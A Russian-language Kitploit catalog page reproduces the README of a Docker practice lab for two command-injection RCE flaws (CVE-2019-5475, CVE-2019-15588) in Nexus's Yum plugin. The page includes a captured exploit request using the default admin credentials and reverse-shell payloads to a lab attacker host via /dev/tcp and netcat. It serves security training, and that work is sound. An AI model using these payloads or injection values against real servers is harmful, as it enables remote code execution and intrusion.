Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-5475 — CVE-2019-5475 靶场: RCE 命令注入漏洞 | Kitploit
Инструменты/GitHubGitHub/exp-docs/cve-2019-5475
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 靶场: RCE 命令注入漏洞

Репозиторий
533 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-5475

CVE-2019-5475 и CVE-2019-15588: RCE-уязвимость внедрения команд


0x00 Предыстория

CVE-2019-5475 — это уязвимость RCE-внедрения команд в Nexus, связанная со встроенным плагином Yum Repository. Впервые она была раскрыта на hackerone, но из-за неполного исправления первой версии возникла дополнительная уязвимость CVE-2019-15588.

Обе уязвимости требуют авторизации под администратором для эксплуатации, однако стандартный пароль администратора Nexus admin123 часто остаётся без изменения, что делает их легко используемыми.

0x10 Среда полигона

0x20 Структура каталогов

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [Maven-проект для отладки: моделирует ввод createrepo или mergerepo в GUI Nexus]
├── nexus ................... [Директория монтирования данных контейнера Nexus]
├── attacker ................ [Директория сборки для машины атакующего]
│   └── Dockerfile .......... [Файл Docker для сборки машины атакующего]
├── docker-compose.yml ...... [Конфигурация сборки Docker]
├── imgs .................... [Изображения для пояснения в README]
└── README.md ............... [Данный файл README]

0x40 Развёртывание полигона

  • На хосте должны быть предустановлены docker и docker-compose.
  • Скачайте данный репозиторий: git clone https://github.com/lyy289065406/CVE-2019-5475
  • Перейдите в директорию сборки Nexus: cd CVE-2019-5475
  • Соберите и запустите Nexus: docker-compose up -d
  • Примерно через 5 минут вы сможете получить доступ к Nexus из браузера (BasicAuth: admin/admin123), где:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

В этом полигоне также развёрнута машина атакующего 172.168.50.2, которая находится в одной сети с обеими целевыми машинами и используется для проверки реверс-шела.

0x50 Проверка полигона [CVE-2019-5475]

0x51 PoC

Войдите под администратором на http://127.0.0.1:8009/nexus/#capabilities, перейдите в Administration -> Capabilities -> Yum: Configuration -> Settings. Там можно найти точку внедрения RCE.

Поля ввода Path of "createrepo" и Path of "mergerepo" подвержены инъекции, результат выполнения можно увидеть в Status.

Например, в поле createrepo введите PoC bash -c id || python, и в Status отобразится результат выполнения команды bash -c id: uid=200(nexus) gid=200(nexus) groups=200(nexus).

Через BurpSuite можно перехватить соответствующий PoC-запрос:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

Эту точку внедрения легко использовать для создания реверс-шела:

  • Войдите на машину атакующего: docker exec -it -u root docker_attacker /bin/bash
  • Запустите прослушивание через netcat: nc -lvvp 4444
  • Введите в поле createrepo полезную нагрузку: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 Проверка полигона [CVE-2019-15588]

0x61 PoC

Место внедрения то же, что и для CVE-2019-5475. Измените PoC на: /bin/bash -c id || /createrepo

0x62 EXP

Для этой уязвимости можно использовать тот же метод для получения реверс-шела:

  • Войдите на машину атакующего: docker exec -it -u root docker_attacker /bin/bash
  • Запустите прослушивание через netcat: nc -lvvp 4444
  • Введите в поле createrepo полезную нагрузку: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 Исправление уязвимостей

  • Для CVE-2019-5475: Первое исправление от разработчиков
  • Для CVE-2019-15588: Второе исправление от разработчиков

0x80 О nexus-yum-core

nexus-yum-core — это фрагмент основного кода Nexus, связанный с эксплуатацией данной уязвимости. Он предназначен в основном для отладки и анализа payload с бэкенда, без необходимости собирать полный сервис Nexus из исходников.

0x90 Ссылки

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
Скачать инструмент